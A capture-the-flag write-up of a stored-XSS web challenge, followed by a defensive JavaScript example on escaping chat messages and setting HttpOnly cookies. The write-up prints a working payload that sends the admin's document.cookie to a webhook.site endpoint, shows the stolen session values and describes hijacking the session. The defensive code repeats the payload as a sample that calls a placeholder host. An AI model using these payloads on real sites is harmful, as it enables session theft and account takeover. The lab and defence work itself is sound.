E-CTF-2025 - Web
Chatroom
In this challenge, we are provided with access to a chatroom, where a message indicates that the admin will read our message in 30 seconds.
This immediately suggests a stored XSS (Cross-Site Scripting) vulnerability: if our message is stored and rendered unescaped in the admin’s browser, any JavaScript we include in it will execute there.
Step 1 - Testing for XSS Injection
To verify whether the input is vulnerable to XSS, I test a simple payload:
<script>alert(1)</script>
Result: An alert box appears, confirming that the injected script executes on the page.
Step 2 - Exfiltrating Admin Cookies
Now that I’ve confirmed the XSS works, I use it to steal the admin’s cookies.
Payload used:
<script> window.location.href = "https://webhook.site/573a7e16-fd1f-4a49-8445-1e5e43a5c297?cookie=" + document.cookie </script>
When the admin’s browser renders the message, this script redirects it to my webhook.site endpoint with the contents of document.cookie appended to the URL, so the admin’s cookies arrive in my request log.
Step 3 - Retrieving Admin Cookie
A few seconds later, I receive a request on my endpoint carrying the admin’s cookie:
Cookie content:
username=Alice
id_value=adminaeg5af2z3cds2csdsdc3cnb
Step 4 - Session Hijacking
With these values, I set the same cookies in my own browser to impersonate the admin’s session.
Step 5 - Accessing and Retrieving the Flag
After refreshing the page with the admin session, I directly access the flag.
Flag: ectf{XSS_1s_d4ng3r0us}
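The chain above depends on two server-side weaknesses: chat messages are rendered as HTML rather than text, and the session cookie is readable from document.cookie. The following is an added example from the defending side, not code from the write-up or the challenge; the function names, the `session` cookie name and the sample messages are assumptions, and the exfiltration URL is a placeholder.

```javascript
// Added example: how a chatroom server should handle the two things the
// write-up's payloads rely on. Plain Node-compatible JavaScript, no dependencies.

// Escape the five characters that let a message break out of a text node or
// attribute value. Messages are rendered as text, never as markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Render one chat line the way the admin's browser would receive it.
function renderMessage(username, message) {
  return `<li><b>${escapeHtml(username)}</b>: ${escapeHtml(message)}</li>`;
}

// Sanity check on rendered output: true if a fragment still carries an element
// that can execute script or an inline event handler attribute.
function containsActiveContent(html) {
  return /<(script|img|svg|iframe)\b|\son[a-z]+\s*=/i.test(html);
}

// Build the Set-Cookie header for the session. The id must be an opaque value
// from a CSPRNG (e.g. crypto.randomBytes); it is passed in here to keep the
// example dependency-free. HttpOnly is what makes document.cookie return
// nothing useful to an injected script; Secure and SameSite limit where the
// browser will send the cookie at all.
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Parse a Set-Cookie header and report the flags relevant to cookie theft;
// handy for a response-header audit or a regression test.
function cookieFlags(setCookie) {
  const attrs = setCookie.split(";").slice(1).map((a) => a.trim().toLowerCase());
  const sameSite = attrs.find((a) => a.startsWith("samesite="));
  return {
    httpOnly: attrs.includes("httponly"),
    secure: attrs.includes("secure"),
    sameSite: sameSite ? sameSite.split("=")[1] : null,
  };
}

// Constructed sample input: the two payload shapes from the write-up, stored as
// chat messages. Both render as inert text.
const samples = [
  "<script>alert(1)</script>",
  '<script> window.location.href = "https://EXFIL-PLACEHOLDER.example/?c=" + document.cookie </script>',
];
for (const m of samples) console.log(renderMessage("guest", m));
console.log(sessionCookieHeader("REPLACE-WITH-RANDOM-ID"));
```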